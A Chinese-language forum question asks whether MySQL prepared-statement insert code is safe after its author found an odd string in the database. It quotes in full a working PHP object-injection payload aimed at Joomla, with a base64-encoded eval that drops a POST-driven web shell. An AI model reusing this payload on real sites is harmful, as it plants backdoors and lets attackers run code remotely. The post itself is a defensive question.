SQL注入安全吗?

时间:2018-07-19 00:50:47

标签: mysql mariadb sql-injection

今天,我在sql数据库中看到了这一点:

| *some data*   | }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:
{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:
{}s:8:"feed_url";s:207:"
eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xkcC5waHAnLCdFRTlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbImZrIl0pOycpOw));
JFactory::getConfig();
exit;";
s:19:"cache_name_function";
s:6:"assert";s:5:"cache"
;b:1;s:11:"cache_class";
O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}�      |

我正在使用此代码将数据放入数据库:

// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
} 

$stmt = $conn->prepare("INSERT INTO $TABLE (VALUE, DEVICE) VALUES (?, ?)");
$stmt->bind_param("ss", $VALUE, $DEVICE);

$stmt->execute();
$stmt->close();
$conn->close();
?>

我安全吗?

我的代码安全吗?还是应该增加另一层安全性?

0 个答案:

没有答案